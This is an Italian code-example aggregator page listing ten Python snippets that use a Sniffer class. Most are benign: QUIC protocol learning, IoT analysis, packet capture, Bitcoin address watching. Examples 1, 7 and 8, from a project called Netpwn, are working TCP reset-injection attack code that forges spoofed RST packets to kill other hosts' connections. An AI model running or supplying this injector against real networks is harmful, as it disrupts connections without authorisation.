Esempi in Python per Sniffer

Linguaggio di programmazione: Python

Spazio dei nomi/nome del pacchetto: sniffer.sniffer

Classe/tipologia: Sniffer

Esempi su hotexamples.com: 10

Sniffer in Python: 10 esempi trovati. Questi sono i migliori esempi reali in Python per sniffer.sniffer.Sniffer, estratti da progetti open source. Li puoi valutare, per aiutarci a migliorare la qualità dei nostri esempi.

Metodi utilizzati di frequente

Mostra Nascondi

Sniffer(7)

init(2)

run(2)

sniff(2)

add_observer(1)

close(1)

remove_observer(1)

set_session_instance(1)

start(1)

stop(1)

stop_sniffing(1)

Esempio n. 1

Mostra file

File: tcpHijack.py Progetto: Dylan-halls/Netpwn

class TCP_Hijack(object):
    """this will perform a tcp hijacking"""
    def __init__(self, arg):
        super(TCP_Hijack, self).__init__()
        self.iface = arg
        self.sniffer = Sniffer()
        self.sniffer.init(self.iface)
        self.unique_id = base64.b64encode(str(random.randint(0, 10000)))

    def pkt_builder(self, packet):
        self.wire = libnet.context(LINK, self.iface)
        tcptag = self.wire.build_tcp(
                                     dp      = packet['TCP_SPORT'],
                                     sp      = packet['TCP_DPORT'],
                                     control = TH_RST,
                                     seq     = packet['TCP_ACK_NUM'],
                                     ack     = packet['TCP_SEQ_NUM']+1,
                                     payload = self.unique_id
                                    )

        iptag = self.wire.build_ipv4(
                                     prot = IPPROTO_TCP,
                                     dst  = socket.inet_aton(packet['IP_SRC']),
                                     src  = socket.inet_aton(packet['IP_DST'])
                                    )

        ethtag = self.wire.build_ethernet(
                                          dst = self.wire.hex_aton(packet['ETH_SHOST']),
                                          src = self.wire.hex_aton(packet['ETH_DHOST'])
                                         )

    def reset(self, packet):
        self.wire.write()
        bytes_written = self.wire.stats()['bytes_written']
        print("({}, {}, {})".format(bytes_written, packet['IP_SRC'], packet['IP_DST']))
        del self.wire

    def pkt_handle(self, packet):
        try:
            if packet['IP_PROTO'] == IPPROTO_TCP:
                if self.unique_id not in packet['TCP_PAYLOAD']:
                    self.pkt_builder(packet)
                    self.reset(packet)
        except KeyError: return -1

    def kill(self):
        while True:
            self.pkt_handle(self.sniffer.sniff())

Esempio n. 2

Mostra file

File: base_detector.py Progetto: ucsb-seclab/diane

 def __init__(self, config, sniffer=None):
     self.len_normal_run = 0
     self.sniffer = sniffer if sniffer else Sniffer(config)
     self.ran_fun = None
     self.normal_run_registered = False
     self.phone_ip = config["android_ip"]
     self.device_ip = config["device_ip"]

Esempio n. 3

Mostra file

File: sniffer.py Progetto: kreitek/cutreronte_v2

 def handle(self, *args, **kwargs):
     print("Sniffer iniciado")
     sniffer = Sniffer()
     try:
         sniffer.run()
     except KeyboardInterrupt:
         sniffer.stop()
         print("Sniffer detenido")
         quit(0)

Esempio n. 4

Mostra file

    def __init__(self) -> None:
        currenttime = datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")
        filename = 'log_{}.txt'.format(currenttime)
        logging.basicConfig(
            filename=filename,
            level=logging.INFO,
            format='%(asctime)s %(levelname)s %(name)s %(message)s')
        self.logger = logging.getLogger(__name__)

        self.sniffer = Sniffer()
        self.sniffer.start()
        self.sniffer.set_session_instance(PacketNumberInstance.get_instance(),
                                          self.logger)
        # self.ndc = NonDeterminismCatcher(self.logger)

        dhke.set_up_my_keys()
        self.learner = RespondDummy()
        try:
            pass
            # self.learner = LearnerConnectionInstance()
            # self.learner.add_observer(self)
            # self.learner.set_up_communication_server()
        except Exception as err:
            self.logger.exception(err)

Esempio n. 5

Mostra file

 def __init__(self,
              config,
              hooker=None,
              sniffer=None,
              bltlog_analyzer=None):
     self.hooker = hooker if hooker else FridaHooker(config)
     self.sniffer = sniffer if sniffer else Sniffer(config)
     self.bltlog_analyzer = bltlog_analyzer if bltlog_analyzer else BltLogAnalyzer(
     )
     self.time_stats = {}
     self.senders = None
     self.running = True
     self.superset_senders = []
     self.run_fun = None
     self.proc_reran = None
     self.adb_driver = ADBDriver()

Esempio n. 6

Mostra file

class Scapy:

    sniffer = None
    learner = None
    response_times = []
    processed = False
    start_time = None
    TIMEOUT = 0.3263230323791504 * 5
    result = ""
    logger = None
    run_results = []
    current_event = None
    run = ""
    ndc = None
    first_time = True
    run_events = []
    previous_result = ""

    def __init__(self) -> None:
        currenttime = datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")
        filename = 'log_{}.txt'.format(currenttime)
        logging.basicConfig(
            filename=filename,
            level=logging.INFO,
            format='%(asctime)s %(levelname)s %(name)s %(message)s')
        self.logger = logging.getLogger(__name__)

        self.sniffer = Sniffer()
        self.sniffer.start()
        self.sniffer.set_session_instance(PacketNumberInstance.get_instance(),
                                          self.logger)
        # self.ndc = NonDeterminismCatcher(self.logger)

        dhke.set_up_my_keys()
        self.learner = RespondDummy()
        try:
            pass
            # self.learner = LearnerConnectionInstance()
            # self.learner.add_observer(self)
            # self.learner.set_up_communication_server()
        except Exception as err:
            self.logger.exception(err)

    def reset(self, reset_server, reset_run=True):
        # also reset the server
        if reset_server:
            # remove the previous session
            CacheInstance.get_instance().remove_session_model()
            filename = str(time.time())
            open('resets/{}'.format(filename), 'a')
            time.sleep(8)

        if reset_run:
            # For the three times a command we do not want to remove the run events, only when there is a complete reset
            # which occurs after an iteration or after an explicit RESET command.
            self.run_events = []

        self.run = ""
        self.previous_result = ""
        PacketNumberInstance.get_instance().reset()
        conn_id = random.getrandbits(64)
        SessionInstance.get_instance().shlo_received = False
        SessionInstance.get_instance().scfg = ""
        SessionInstance.get_instance().zero_rtt = False
        self.logger.info("Changing CID from {}".format(
            SessionInstance.get_instance().connection_id))
        SessionInstance.get_instance().connection_id_as_number = conn_id
        SessionInstance.get_instance().connection_id = str(
            format(conn_id, 'x').zfill(16))  # Pad to 16 chars
        self.logger.info("To {}".format(
            SessionInstance.get_instance().connection_id))

    def send_chlo(self, only_reset):
        # print("Only reset? {}".format(only_reset))
        self.reset(only_reset)

        if only_reset:
            self.learner.respond("RESET")
            return

        # print(SessionInstance.get_instance().connection_id)

        # print("Sending CHLO")
        chlo = QUICHeader()
        conf.L3socket = L3RawSocket

        chlo.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))
        chlo.setfieldval(
            "Packet Number",
            PacketNumberInstance.get_instance().get_next_packet_number())

        associated_data = extract_from_packet(chlo, end=15)
        body = extract_from_packet(chlo, start=27)

        message_authentication_hash = FNV128A().generate_hash(
            associated_data, body)
        chlo.setfieldval('Message Authentication Hash',
                         string_to_ascii(message_authentication_hash))

        # Store chlo for the key derivation
        SessionInstance.get_instance(
        ).chlo = extract_from_packet_as_bytestring(chlo)
        self.sniffer.add_observer(self)

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121, sport=61250) / chlo
        send(p)
        self.wait_for_signal_or_expiration()
        self.processed = False
        self.sniffer.remove_observer(self)

    def wait_for_signal_or_expiration(self):
        # wait for a specific time otherwise
        start = time.time()
        expired = False
        print(self.run_results)
        while not self.processed and not expired:
            if time.time() - start >= self.TIMEOUT:
                expired = True
        if expired:
            # print("General expired")
            if len(self.run_results) == 3 or True:
                # Get the majority element
                c = Counter(self.run_results)
                value, count = c.most_common()[0]
                self.learner.respond(value)
                self.logger.info("General expired")
                self.run += str(self.current_event)
                # self.ndc.add_run(self.run, value)
                self.run_results = []
                self.previous_result = value
                # self.reset(True, False)    # Reset the server
            else:
                self.run_results.append("EXP")
                self.logger.info(
                    "Received first time {} launching again".format("EXP"))
                time.sleep(2)
                self.logger.info("Run events {}".format(self.run_events))
                # if not isinstance(self.current_event, SendGETRequestEvent):
                self.send(self.current_event, True)
        else:
            # print("General response {}".format(self.result))
            self.logger.info("Currently at run results {}".format(
                self.run_results))
            self.logger.info("Current running event {}".format(
                self.current_event))
            self.logger.info("Previous result {}".format(self.previous_result))
            if isinstance(self.current_event, CloseConnectionEvent):
                if self.previous_result == "EXP":
                    self.learner.respond("closed")
                    self.run_results = []
                    return
            if isinstance(self.current_event, SendGETRequestEvent):
                # Does not need multiple times, as only the first time we get an HTTP response
                if self.previous_result == "EXP":
                    self.learner.respond("EXP")
                    self.run_results = []
                    return
                elif self.result == "REJ":
                    self.learner.respond("EXP")
                    self.run_results = []
                    self.result = ""
                    return
                elif self.previous_result == "shlo":
                    self.learner.respond("http")
                    self.previous_result = "http"
                    self.result = ""
                    self.run_results = []
                    return
                else:
                    self.learner.respond(self.result)
                    self.previous_result = self.result
                    self.result = ""
                    self.run_results = []
                    return
            if isinstance(self.current_event, SendInitialCHLOEvent):
                # Does not really need to send multiple times
                if self.previous_result == "":
                    self.learner.respond("REJ")
                    self.previous_result = "REJ"
                    self.result = ""
                    self.run_results = []
                    return
            if isinstance(self.current_event, SendFullCHLOEvent):
                # If it is a full CHLO and we receive a SHLO. Do not send it again
                if self.result == "http":
                    self.learner.respond("EXP")
                    self.result = ""
                    self.run_results = []
                    return

                elif self.previous_result == "EXP":
                    self.learner.respond("EXP")
                    self.previous_result = "EXP"
                    self.run_results = []
                    return

                elif self.previous_result == "shlo":
                    self.learner.respond("EXP")
                    self.previous_result = "EXP"
                    self.run_results = []
                    return

                elif self.previous_result == "" or self.previous_result == "PRST":
                    self.learner.respond("PRST")
                    self.result = ""
                    self.run_results = []
                    return

                if self.result == "shlo":
                    self.learner.respond("shlo")
                    self.run_results = []
                    self.previous_result = "shlo"
                    return

            if isinstance(self.current_event, ZeroRTTCHLOEvent):
                # We can only send this once, otherwise the second time it will automatically send it as a full message
                SessionInstance.get_instance(
                ).currently_sending_zero_rtt = False
                if self.result == "REJ" or self.result == "shlo":
                    self.learner.respond(self.result)
                    self.previous_result = self.result
                    self.run_results = []
                    return

            if len(self.run_results) == 2 and isinstance(
                    self.current_event, ZeroRTTCHLOEvent):
                # We actually need it, otherwise a subsequent Full CHLO will not result in a SHLO.
                SessionInstance.get_instance(
                ).currently_sending_zero_rtt = False
            if len(self.run_results) == 3 or True:
                # Get the majority element
                if self.run_results.count("EXP") < 3:
                    self.run_results = [
                        x for x in self.run_results if 'EXP' != x
                    ]
                c = Counter(self.run_results)
                value, count = c.most_common()[0]
                if isinstance(self.current_event, SendGETRequestEvent):
                    # If there is atleast one HTTP response, then it is a HTTP response.
                    # Because the server didn't respond to three subsequent GET requests.
                    if "http" in self.run_results:
                        value = "http"
                    if "REJ" in self.run_results:
                        if self.run_results.count("REJ") == len(
                                self.run_results):
                            value = "EXP"
                        else:
                            # remove all the REJs
                            value = list(
                                filter(lambda a: a != 'REJ',
                                       self.run_results))[0]
                    if self.previous_result == "shlo" and "http" not in self.run_results:
                        value = "http"

                if isinstance(self.current_event, ZeroRTTCHLOEvent):
                    SessionInstance.get_instance(
                    ).currently_sending_zero_rtt = False
                    if value == "REJ":
                        SessionInstance.get_instance().zero_rtt = False
                    elif value == "shlo":
                        SessionInstance.get_instance().zero_rtt = True

                    if self.previous_result == "REJ" and value != "shlo":
                        value = "shlo"
                    elif self.previous_result == "shlo":
                        value = "shlo"
                    elif value == "EXP":
                        value = "REJ"

                self.learner.respond(value)
                self.logger.info("Responding to learner {}".format(value))
                # self.run += str(self.current_event)
                # self.ndc.add_run(self.run, value)
                self.previous_result = value
                self.run_results = []
                # self.reset(True, False)
            else:
                self.run_results.append(self.result)
                self.logger.info(
                    "Received first time {} launching again".format(
                        self.result))
                time.sleep(2)
                self.logger.info("Run events {}".format(self.run_events))
                # if not isinstance(self.current_event, SendGETRequestEvent):
                self.send(self.current_event, True)

        self.logger.info("=========== Request Finished ===========")
        self.result = ""

    def send_first_ack(self):
        chlo = ACKPacket()
        conf.L3socket = L3RawSocket

        chlo.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))
        chlo.setfieldval(
            "Packet Number",
            PacketNumberInstance.get_instance().get_next_packet_number())

        # print("First Ack Packet Number {}".format(int(str(PacketNumberInstance.get_instance().highest_received_packet_number), 16)))
        chlo.setfieldval(
            'Largest Acked',
            int(
                str(PacketNumberInstance.get_instance().
                    highest_received_packet_number), 16))
        chlo.setfieldval(
            'First Ack Block Length',
            int(
                str(PacketNumberInstance.get_instance().
                    highest_received_packet_number), 16))

        # chlo.setfieldval('Largest Acked', 3)
        # chlo.setfieldval('First Ack Block Length', 3)

        associated_data = extract_from_packet(chlo, end=15)
        body = extract_from_packet(chlo, start=27)

        # print("Associated data {}".format(associated_data))
        # print("Body {}".format(body))

        message_authentication_hash = FNV128A().generate_hash(
            associated_data, body, True)
        chlo.setfieldval('Message Authentication Hash',
                         string_to_ascii(message_authentication_hash))

        # print("Sending first ACK...")

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121, sport=61250) / chlo
        send(p)

    def send_second_ack(self):
        chlo = SecondACKPacket()
        conf.L3socket = L3RawSocket

        chlo.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))
        chlo.setfieldval(
            "Packet Number",
            PacketNumberInstance.get_instance().get_next_packet_number())

        associated_data = extract_from_packet(chlo, end=15)
        body = extract_from_packet(chlo, start=27)

        message_authentication_hash = FNV128A().generate_hash(
            associated_data, body)
        chlo.setfieldval('Message Authentication Hash',
                         string_to_ascii(message_authentication_hash))

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121, sport=61250) / chlo
        send(p)

    def send_ack_for_encrypted_message(self):
        ack = AckNotificationPacket()
        conf.L3socket = L3RawSocket

        ack.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))

        next_packet_number_int = PacketNumberInstance.get_instance(
        ).get_next_packet_number()
        next_packet_number_byte = int(next_packet_number_int).to_bytes(
            8, byteorder='little')
        next_packet_number_nonce = int(next_packet_number_int).to_bytes(
            2, byteorder='big')
        # print("Sending encrypted ack for packet number {}".format(next_packet_number_int))

        ack.setfieldval("Packet Number", next_packet_number_int)
        highest_received_packet_number = format(
            int(
                PacketNumberInstance.get_instance().
                get_highest_received_packet_number(), 16), 'x')

        ack_body = "40"
        ack_body += str(highest_received_packet_number).zfill(2)
        ack_body += "0062"
        ack_body += str(highest_received_packet_number).zfill(2)
        ack_body += "00"
        # not sure yet if we can remove this?

        keys = SessionInstance.get_instance().keys

        request = {
            'mode':
            'encryption',
            'input':
            ack_body,
            'key':
            keys['key1'].hex(),  # For encryption, we use my key
            'additionalData':
            "18" + SessionInstance.get_instance().connection_id +
            next_packet_number_byte.hex()
            [:4],  # Fixed public flags 18 || fixed connection Id || packet number
            'nonce':
            keys['iv1'].hex() + next_packet_number_nonce.hex().ljust(16, '0')
        }

        # print("Ack request for encryption {}".format(request))

        ciphertext = CryptoConnectionManager.send_message(
            ConnectionEndpoint.CRYPTO_ORACLE,
            json.dumps(request).encode('utf-8'), True)
        ciphertext = ciphertext['data']
        # print("Ciphertext in ack {}".format(ciphertext))

        ack.setfieldval("Message Authentication Hash",
                        string_to_ascii(ciphertext[:24]))
        SessionInstance.get_instance().nr_ack_send += 1

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121,
            sport=61250) / ack / Raw(load=string_to_ascii(ciphertext[24:]))
        send(p)

    def handle_received_encrypted_packet(self, packet):
        a = AEADPacketDynamic(packet[0][1][1].payload.load)
        a.parse()
        # print(">>>>>>>> Received packet with MAH: {}".format(a.get_field(AEADFieldNames.MESSAGE_AUTHENTICATION_HASH)))

        # Start key derixvation
        SessionInstance.get_instance().div_nonce = a.get_field(
            AEADFieldNames.DIVERSIFICATION_NONCE)
        SessionInstance.get_instance(
        ).message_authentication_hash = a.get_field(
            AEADFieldNames.MESSAGE_AUTHENTICATION_HASH)
        packet_number = a.get_field(AEADFieldNames.PACKET_NUMBER)
        SessionInstance.get_instance().packet_number = packet_number
        # print("Packet Number {}".format(packet_number))
        SessionInstance.get_instance(
        ).largest_observed_packet_number = packet_number
        SessionInstance.get_instance().associated_data = a.get_associated_data(
        )
        # print("Associated Data {}".format(SessionInstance.get_instance().associated_data))
        ciphertext = split_at_nth_char(
            a.get_field(AEADFieldNames.ENCRYPTED_FRAMES))

        # print("Received peer public value {}".format(SessionInstance.get_instance().peer_public_value))
        dhke.generate_keys(SessionInstance.get_instance().peer_public_value,
                           SessionInstance.get_instance().shlo_received)
        # SessionInstance.get_instance().packet_number = packet_number

        # Process the streams
        processor = FramesProcessor(ciphertext)
        processor.process()

    def send_ping(self):
        print("Sending ping message...")
        ping = PingPacket()
        ping.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))

        packet_number = PacketNumberInstance.get_instance(
        ).get_next_packet_number()
        ciphertext = CryptoManager.encrypt(bytes.fromhex("07"), packet_number,
                                           SessionInstance.get_instance())

        ping.setfieldval('Packet Number', packet_number)
        ping.setfieldval("Message Authentication Hash",
                         string_to_ascii(ciphertext[:24]))

        conf.L3socket = L3RawSocket
        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121,
            sport=61250) / ping / Raw(load=string_to_ascii(ciphertext[24:]))
        # Maybe we cannot assume that is just a version negotiation packet?
        send(p)

    def send_full_chlo(self):
        chlo = FullCHLOPacket()

        chlo.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))
        chlo.setfieldval('SCID_Value',
                         SessionInstance.get_instance().server_config_id)
        chlo.setfieldval('STK_Value',
                         SessionInstance.get_instance().source_address_token)

        # Lets just create the public key for DHKE
        dhke.set_up_my_keys()

        chlo.setfieldval(
            "Packet Number",
            PacketNumberInstance.get_instance().get_next_packet_number())
        chlo.setfieldval(
            'PUBS_Value',
            string_to_ascii(
                SessionInstance.get_instance().public_values_bytes))

        associated_data = extract_from_packet(chlo, end=15)
        body = extract_from_packet(chlo, start=27)

        message_authentication_hash = FNV128A().generate_hash(
            associated_data, body)
        chlo.setfieldval('Message Authentication Hash',
                         string_to_ascii(message_authentication_hash))

        conf.L3socket = L3RawSocket
        SessionInstance.get_instance(
        ).chlo = extract_from_packet_as_bytestring(
            chlo, start=31
        )  # CHLO from the CHLO tag, which starts at offset 26 (22 header + frame type + stream id + offset)

        # print("Send full CHLO")

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121, sport=61250) / chlo
        # Maybe we cannot assume that is just a version negotiation packet?
        # ans, _ = sr(p)
        self.sniffer.add_observer(self)
        send(p)
        self.wait_for_signal_or_expiration()

        self.processed = False
        self.sniffer.remove_observer(self)

    def close_connection(self):
        """
        We do this the unfriendly way, since GoAway does not work. friendly way by means of a Go Away
        :return:
        """
        frame_data = "02"  # frame type
        frame_data += "00000000"  # error code, no error
        # frame_data += "00000000"    # latest responded stream Id
        frame_data += "0000"  # No reason therefore length of 0

        # encrypt it
        packet_number = PacketNumberInstance.get_instance(
        ).get_next_packet_number()
        ciphertext = CryptoManager.encrypt(bytes.fromhex(frame_data),
                                           packet_number,
                                           SessionInstance.get_instance(),
                                           self.logger)

        a = AEADRequestPacket()
        a.setfieldval("Public Flags", 0x18)
        a.setfieldval('Packet Number', packet_number)
        a.setfieldval("Message Authentication Hash",
                      string_to_ascii(ciphertext[0:24]))
        a.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))

        self.logger.info("Closing connection {}".format(
            SessionInstance.get_instance().connection_id))

        self.logger.info("With ciphertext {}".format(ciphertext))
        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121,
            sport=61250) / a / Raw(load=string_to_ascii(ciphertext[24:]))
        # ans, _ = sr(p, count=3)
        send(p)
        self.wait_for_signal_or_expiration()
        self.processed = False
        self.sniffer.remove_observer(self)
        time.sleep(1)

    def send_full_chlo_to_existing_connection(self):
        """
        Is it sent encrypted?
        :return:
        """
        try:
            previous_session = SessionModel.get(SessionModel.id == 1)
            self.logger.info(previous_session)
            self.logger.info("Server config Id {}".format(
                previous_session.server_config_id))
            self.logger.info(SessionInstance.get_instance().app_keys)
            SessionInstance.get_instance(
            ).last_received_rej = "-1"  # I want to force the sniffer to generate a new set of keys.
            SessionInstance.get_instance().zero_rtt = True

            # The order is important!
            tags = [
                {
                    'name':
                    'PAD',
                    'value':
                    '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
                },
                {
                    'name': 'SNI',
                    'value': '7777772e6578616d706c652e6f7267'
                },
                {
                    'name': 'STK',
                    'value': previous_session.source_address_token
                },
                {
                    'name': 'SNO',
                    'value': previous_session.server_nonce
                },
                {
                    'name': 'VER',
                    'value': '00000000'
                },
                {
                    'name': 'CCS',
                    'value': '01e8816092921ae87eed8086a2158291'
                },
                {
                    'name':
                    'NONC',
                    'value':
                    '5ac349e90091b5556f1a3c52eb57f92c12640e876e26ab2601c02b2a32f54830'
                },
                {
                    'name': 'AEAD',
                    'value': '41455347'  # AESGCM12
                },
                {
                    'name': 'SCID',
                    'value': previous_session.server_config_id
                },
                {
                    'name': 'PDMD',
                    'value': '58353039'
                },
                {
                    'name': 'ICSL',
                    'value': '1e000000'
                },
                {
                    'name':
                    'PUBS',
                    'value':
                    '96D49F2CE98F31F053DCB6DFE729669385E5FD99D5AA36615E1A9AD57C1B090C'
                },
                {
                    'name': 'MIDS',
                    'value': '64000000'
                },
                {
                    'name': 'KEXS',
                    'value': '43323535'  # C25519
                },
                {
                    'name': 'XLCT',
                    'value': '8d884a6c79a0e6de'
                },
                {
                    'name': 'CFCW',
                    'value': '00c00000'
                },
                {
                    'name': 'SFCW',
                    'value': '00800000'
                },
            ]

            d = DynamicCHLOPacket(tags)
            body = d.build_body()
            PacketNumberInstance.get_instance().reset()

            conn_id = random.getrandbits(64)
            SessionInstance.get_instance(
            ).server_nonce = previous_session.server_nonce
            SessionInstance.get_instance().connection_id_as_number = conn_id
            SessionInstance.get_instance().connection_id = str(
                format(conn_id, 'x').zfill(8))
            SessionInstance.get_instance().peer_public_value = bytes.fromhex(
                previous_session.public_value)
            self.logger.info("Using connection Id {}".format(
                SessionInstance.get_instance().connection_id))
            SessionInstance.get_instance().shlo_received = False
            # SessionInstance.get_instance().zero_rtt = True  # This one should only be set if the Zero RTT CHLO does not result in a REJ.
            #
            a = FullCHLOPacketNoPadding()
            a.setfieldval(
                'Packet Number',
                PacketNumberInstance.get_instance().get_next_packet_number())
            a.setfieldval(
                'CID',
                string_to_ascii(SessionInstance.get_instance().connection_id))

            # # Lets just create the public key for DHKE
            dhke.set_up_my_keys()

            associated_data = extract_from_packet(a, end=15)
            body_mah = [body[i:i + 2] for i in range(0, len(body), 2)]
            message_authentication_hash = FNV128A().generate_hash(
                associated_data, body_mah)

            conf.L3socket = L3RawSocket
            SessionInstance.get_instance(
            ).chlo = extract_from_packet_as_bytestring(
                a, start=27
            )  # CHLO from the CHLO tag, which starts at offset 26 (22 header + frame type + stream id + offset)
            SessionInstance.get_instance().chlo += body[4:]

            # dhke.generate_keys(bytes.fromhex(previous_session.public_value), False)
            # ciphertext = CryptoManager.encrypt(bytes.fromhex(SessionInstance.get_instance().chlo), 1)
            #
            a.setfieldval('Message Authentication Hash',
                          string_to_ascii(message_authentication_hash))
            #
            # print("Send full CHLO from existing connection")
            #
            p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
                dport=6121, sport=61250) / a / Raw(load=string_to_ascii(body))
            # # Maybe we cannot assume that is just a version negotiation packet?
            self.sniffer.add_observer(self)
            send(p)
            self.wait_for_signal_or_expiration()

            self.processed = False
            self.sniffer.remove_observer(self)
        except Exception:
            self.send_chlo(False)

    def send_encrypted_request(self):
        """
        Make an AEAD GET Request to example.org
        :return:
        """
        self.logger.info("Making GET Request")

        # Generate forward secure keys if it hasn't already been done.
        current_app_key = SessionInstance.get_instance().app_keys
        if current_app_key['type'] != "FORWARD" or current_app_key[
                'mah'] != SessionInstance.get_instance().last_received_shlo:
            if len(SessionInstance.get_instance().peer_public_value) == 0:
                pass
            else:
                key = dhke.generate_keys(
                    SessionInstance.get_instance().peer_public_value, True,
                    self.logger)
                SessionInstance.get_instance().app_keys['type'] = "FORWARD"
                SessionInstance.get_instance().app_keys[
                    'mah'] = SessionInstance.get_instance().last_received_shlo
                SessionInstance.get_instance().app_keys['key'] = key

        get_request = "800300002501250000000500000000FF418FF1E3C2E5F23A6BA0AB9EC9AE38110782848750839BD9AB7A85ED6988B4C7"

        packet_number = PacketNumberInstance.get_instance(
        ).get_next_packet_number()
        ciphertext = CryptoManager.encrypt(bytes.fromhex(get_request),
                                           packet_number,
                                           SessionInstance.get_instance(),
                                           self.logger)

        # Send it to the server
        a = AEADRequestPacket()
        a.setfieldval(
            'CID',
            string_to_ascii(SessionInstance.get_instance().connection_id))
        a.setfieldval("Public Flags", 0x18)
        a.setfieldval('Packet Number', packet_number)
        a.setfieldval("Message Authentication Hash",
                      string_to_ascii(ciphertext[0:24]))

        p = IP(dst=SessionInstance.get_instance().destination_ip) / UDP(
            dport=6121,
            sport=61250) / a / Raw(load=string_to_ascii(ciphertext[24:]))
        self.sniffer.add_observer(self)
        send(p)
        self.wait_for_signal_or_expiration()
        self.processed = False
        self.sniffer.remove_observer(self)

    def stop_sniffer(self):
        self.sniffer.stop_sniffing()

    def send(self, command, deterministic_repeat=False):
        self.logger.info(command)
        self.current_event = command
        if not deterministic_repeat:
            self.run_events.append(command)
        try:
            if isinstance(command, ResetEvent):
                self.logger.info("Resetting received")
                self.send_chlo(True)
            if isinstance(command, SendInitialCHLOEvent):
                self.logger.info("Sending CHLO")
                self.send_chlo(False)
            elif isinstance(command, SendGETRequestEvent):
                self.logger.info("Sending GET")
                self.send_encrypted_request()
            elif isinstance(command, CloseConnectionEvent):
                self.logger.info("Closing connection")
                self.close_connection()
            elif isinstance(command, SendFullCHLOEvent):
                self.logger.info("Sending Full CHLO")
                self.send_full_chlo()
            elif isinstance(command, ZeroRTTCHLOEvent):
                self.logger.info("Sending Zero RTT CHLO")
                self.send_full_chlo_to_existing_connection()
            else:
                self.logger.info("Unknown command {}".format(command))
        except Exception as err:
            self.logger.exception(err)

    def update(self, event, result):
        try:
            self.logger.info("Scapy Received result {}".format(result))
            self.result = result
            self.processed = True
        except Exception as err:
            self.logger.error(err)

Esempio n. 7

Mostra file

File: tcpHijack.py Progetto: Dylan-halls/Netpwn

 def __init__(self, arg):
     super(TCP_Hijack, self).__init__()
     self.iface = arg
     self.sniffer = Sniffer()
     self.sniffer.init(self.iface)
     self.unique_id = base64.b64encode(str(random.randint(0, 10000)))

Esempio n. 8

Mostra file

File: hijack_proto.py Progetto: Dylan-halls/Netpwn

    srcip = socket.inet_ntoa(inj.get_ipaddr4())
    tcptag = inj.build_tcp(dp=packet['TCP_SPORT'],
                           sp=packet['TCP_DPORT'],
                           control=TH_RST,
                           seq=packet['TCP_ACK_NUM'],
                           ack=packet['TCP_SEQ_NUM'] + 1)

    iptag = inj.build_ipv4(prot=IPPROTO_TCP,
                           dst=socket.inet_aton(packet['IP_SRC']),
                           src=socket.inet_aton(packet['IP_DST']))

    ethtag = inj.build_ethernet(dst=inj.hex_aton(packet['ETH_SHOST']),
                                src=inj.hex_aton(packet['ETH_DHOST']))
    inj.write()
    del inj
    return


def packet_handle(packet):
    try:
        if packet['IP_PROTO'] == IPPROTO_TCP:
            packet_factory(packet)
    except KeyError:
        return -1


sniffer = Sniffer()
sniffer.init('wlp3s0')
while True:
    packet_handle(sniffer.sniff())

Esempio n. 9

Mostra file

                            action='store_true',
                            help='catching others protocols')
    args = arg_parser.parse_args()
    ips = [IP(x) for x in args.ips]
    macs = [MAC(x) for x in args.macs]
    if args.net:
        ip_nets = [IPNetwork(x) for x in args.net]
    else:
        ip_nets = []
    available_eth_protocols = set()
    if args.ip or args.tcp or args.udp:
        available_eth_protocols.add(EthProtocols.IP)
    if available_eth_protocols == set():
        available_eth_protocols = {EthProtocols.IP, EthProtocols.OTHER}
    available_ip_protocols = set()
    if args.tcp:
        available_ip_protocols.add(IPProtocols.TCP)
    if args.udp:
        available_ip_protocols.add(IPProtocols.UDP)
    if args.other:
        available_ip_protocols.add(IPProtocols.OTHER)
    if available_ip_protocols == set():
        available_ip_protocols = set()
    sniffer = Sniffer(args.a, args.f, args.file_size, args.n,
                      available_eth_protocols, available_ip_protocols, ips,
                      macs, ip_nets, args.timer)
    try:
        sniffer.run()
    finally:
        sniffer.close()

Esempio n. 10

Mostra file

File: start.py Progetto: bit-oasis/sniffer

__author__ = 'tom'

from sniffer.config import Config
import signal
from sniffer.sniffer import Sniffer

config = Config('./sniffer.conf')



def signal_handler(signal, frame):
	print "SIGINT, Exiting"
	sniffer.stop()
signal.signal(signal.SIGINT, signal_handler)

print ""
print "   ###################################################################"
print "   #                                                                 #"
print "   #   SNIFFER                                                       #"
print "   #   by BitOasis.net, Tom James Holub                              #"
print "   #                                                                 #"
print "   #   Subscribe for incoming transactions on Bitcoin addresses      #"
print "   #   Check wiki on https://github.com/bit-oasis/sniffer            #"
print "   #                                                                 #"
print "   ###################################################################"
print ""

sniffer = Sniffer(config)
sniffer.start()